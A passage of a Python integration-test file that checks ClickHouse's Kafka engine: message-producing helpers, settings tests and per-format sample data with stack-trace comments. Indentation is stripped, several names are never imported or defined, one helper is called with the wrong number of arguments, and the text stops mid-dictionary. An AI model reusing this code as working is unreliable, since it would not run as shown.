from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def describe_consumer_group(kafka_cluster, name):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
consumer_groups = admin_client.describe_consumer_groups([name])
res = []
for member in consumer_groups[0].members:
member_info = {}
member_info['member_id'] = member.member_id
member_info['client_id'] = member.client_id
member_info['client_host'] = member.client_host
member_topics_assignment = []
for (topic, partitions) in member.member_assignment.assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available() # ensure kafka is alive
kafka_producer_send_heartbeat_msg() # ensure python kafka client is ok
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
@pytest.mark.timeout(120)
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
